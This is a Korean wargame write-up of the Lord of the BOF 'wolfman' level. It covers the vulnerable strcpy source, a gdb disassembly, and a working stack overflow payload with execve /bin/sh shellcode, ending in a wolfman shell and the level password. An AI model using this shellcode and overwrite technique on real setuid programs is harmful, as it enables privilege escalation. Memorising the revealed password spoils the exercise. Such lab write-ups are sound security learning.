


[시스템해킹][LOB] Level5 : Orc -> Wolfman

sh4n3e 2017. 6. 22. 16:31

우선 코드부터 살펴보자.

 


wolfman  wolfman.c
[orc@localhost orc]$ cat wolfman.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - wolfman
        - egghunter + buffer hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

/*
 * Challenge binary, intentionally vulnerable: copies argv[1] into a
 * 40-byte stack buffer with an unbounded strcpy().  Reproduced as it
 * appears in the post; the closing brace of main() is cut off in the
 * original listing.
 *
 * NOTE: memset() and strlen() are called without #include <string.h>
 * (only stdio.h and stdlib.h are included), so they are implicitly
 * declared here, and main() is declared without a return type
 * (implicit int) -- both rejected by modern compilers.
 */
main(int argc, char *argv[])
{
 char buffer[40];   /* destination of the unbounded strcpy() below */
 int i;

 if(argc < 2){
  printf("argv error\n");
  exit(0);
 }

 // egghunter: zero every environment string in place.  Only the
 // environ[] strings are wiped; argv is not touched by this loop.
 for(i=0; environ[i]; i++)
  memset(environ[i], 0, strlen(environ[i]));

 // argv[1][47] is read without any check on the length of argv[1];
 // a shorter argument turns this into an out-of-bounds read.
 if(argv[1][47] != '\xbf')
 {
  printf("stack is still your friend.\n");
  exit(0);
 }

 // No length check: an argv[1] of more than 39 bytes overruns buffer
 // (stack buffer overflow).  A bounded copy, e.g.
 // snprintf(buffer, sizeof buffer, "%s", argv[1]), would prevent it.
 strcpy(buffer, argv[1]);
 printf("%s\n", buffer);

        // buffer hunter: clears only the 40 bytes of buffer itself; anything
        // the strcpy above wrote past the end of buffer is left as is.
        memset(buffer, 0, 40);

 

이번 문제는 Level4의 문제와 다를 게 없다는 것을 확인할 수 있다. 다만 뒤에서 memset을 해주는데, 이 memset은 buffer의 40바이트만 지울 뿐 그 뒤에 있는 리턴 주소나 argv[1]에 놓인 셸코드에는 손대지 않으므로 Level4에서 사용한 방법에는 영향을 미치지 않고, Payload 또한 그대로 사용해도 된다. 다만, Ret 부분만 약간 변경해주면 된다. 우선 어셈블 코드와 기타 메모리를 확인해보자.

 

[orc@localhost orc]$ gdb -q w
(gdb) set disassembly-flavor intel
(gdb) disass main
Dump of assembler code for function main:
0x8048500 <main>: push   %ebp
0x8048501 <main+1>: mov    %ebp,%esp
0x8048503 <main+3>: sub    %esp,44
0x8048506 <main+6>: cmp    DWORD PTR [%ebp+8],1
0x804850a <main+10>: jg     0x8048523 <main+35>
0x804850c <main+12>: push   0x8048640
0x8048511 <main+17>: call   0x8048410 <printf>
0x8048516 <main+22>: add    %esp,4
0x8048519 <main+25>: push   0
0x804851b <main+27>: call   0x8048420 <exit>
0x8048520 <main+32>: add    %esp,4
0x8048523 <main+35>: nop   
0x8048524 <main+36>: mov    DWORD PTR [%ebp-44],0x0
0x804852b <main+43>: nop   
0x804852c <main+44>: lea    %esi,[%esi*1]
0x8048530 <main+48>: mov    %eax,DWORD PTR [%ebp-44]
0x8048533 <main+51>: lea    %edx,[%eax*4]
0x804853a <main+58>: mov    %eax,%ds:0x8049760
0x804853f <main+63>: cmp    DWORD PTR [%eax+%edx],0
0x8048543 <main+67>: jne    0x8048547 <main+71>
0x8048545 <main+69>: jmp    0x8048587 <main+135>
0x8048547 <main+71>: mov    %eax,DWORD PTR [%ebp-44]
0x804854a <main+74>: lea    %edx,[%eax*4]
0x8048551 <main+81>: mov    %eax,%ds:0x8049760
0x8048556 <main+86>: mov    %edx,DWORD PTR [%eax+%edx]
0x8048559 <main+89>: push   %edx
0x804855a <main+90>: call   0x80483f0 <strlen>
0x804855f <main+95>: add    %esp,4
0x8048562 <main+98>: mov    %eax,%eax
0x8048564 <main+100>: push   %eax
0x8048565 <main+101>: push   0
0x8048567 <main+103>: mov    %eax,DWORD PTR [%ebp-44]
0x804856a <main+106>: lea    %edx,[%eax*4]
0x8048571 <main+113>: mov    %eax,%ds:0x8049760
0x8048576 <main+118>: mov    %edx,DWORD PTR [%eax+%edx]
0x8048579 <main+121>: push   %edx
0x804857a <main+122>: call   0x8048430 <memset>
0x804857f <main+127>: add    %esp,12
0x8048582 <main+130>: inc    DWORD PTR [%ebp-44]
0x8048585 <main+133>: jmp    0x8048530 <main+48>
0x8048587 <main+135>: mov    %eax,DWORD PTR [%ebp+12]
0x804858a <main+138>: add    %eax,4
0x804858d <main+141>: mov    %edx,DWORD PTR [%eax]
0x804858f <main+143>: add    %edx,47
0x8048592 <main+146>: cmp    BYTE PTR [%edx],0xbf
0x8048595 <main+149>: je     0x80485b0 <main+176>
0x8048597 <main+151>: push   0x804864c
0x804859c <main+156>: call   0x8048410 <printf>
0x80485a1 <main+161>: add    %esp,4
0x80485a4 <main+164>: push   0
0x80485a6 <main+166>: call   0x8048420 <exit>
0x80485ab <main+171>: add    %esp,4
0x80485ae <main+174>: mov    %esi,%esi
0x80485b0 <main+176>: mov    %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>: add    %eax,4
0x80485b6 <main+182>: mov    %edx,DWORD PTR [%eax]
0x80485b8 <main+184>: push   %edx
0x80485b9 <main+185>: lea    %eax,[%ebp-40]
0x80485bc <main+188>: push   %eax
0x80485bd <main+189>: call   0x8048440 <strcpy>

0x80485c2 <main+194>: add    %esp,8
0x80485c5 <main+197>: lea    %eax,[%ebp-40]
0x80485c8 <main+200>: push   %eax
0x80485c9 <main+201>: push   0x8048669
0x80485ce <main+206>: call   0x8048410 <printf>
0x80485d3 <main+211>: add    %esp,8
0x80485d6 <main+214>: push   40
0x80485d8 <main+216>: push   0
0x80485da <main+218>: lea    %eax,[%ebp-40]
0x80485dd <main+221>: push   %eax
0x80485de <main+222>: call   0x8048430 <memset>
0x80485e3 <main+227>: add    %esp,12
0x80485e6 <main+230>: leave 
0x80485e7 <main+231>: ret   
0x80485e8 <main+232>: nop   
0x80485e9 <main+233>: nop   
0x80485ea <main+234>: nop   
0x80485eb <main+235>: nop   
0x80485ec <main+236>: nop   
0x80485ed <main+237>: nop   
0x80485ee <main+238>: nop   
0x80485ef <main+239>: nop   
End of assembler dump.
(gdb) b *main+146
Breakpoint 1 at 0x8048592
<3\x89\xe1\x99\xb0\x0b\xcd\x80"+"\xe7\xfd\xff\xbf"')                        
Starting program: /home/orc/w $(python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\xe7\xfd\xff\xbf"')

Breakpoint 1, 0x8048592 in main ()
(gdb) x/40x $edx
0xbffffe2d: 0x000000bf 0x00000000 0x00000000 0x00000000
0xbffffe3d: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe4d: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe5d: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe6d: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe7d: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe8d: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe9d: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffead: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffebd: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) x/40x $edx-47
0xbffffdfe: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe0e: 0x90909090 0x6850c031 0x68732f2f 0x69622f68
0xbffffe1e: 0x50e3896e 0x99e18953 0x80cd0bb0 0xbffffde7

0xbffffe2e: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe3e: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe4e: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe5e: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe6e: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe7e: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe8e: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) q  

 

별다른 것은 없다는 것을 다시 한번 확인할 수 있다. 그럼 Payload를 작성해보자.

 

 $(python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x08\xfe\xff\xbf"')

 

그럼 작성한 Payload를 가지고 공격해보자.

 

<\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x08\xfe\xff\xbf"') 
��������������������1�Ph//shh/bin��PS�ᙰ
                                      ���
bash$
bash$ id
uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc)

bash$ /bin/my-pass
euid = 505
love eyuna

 
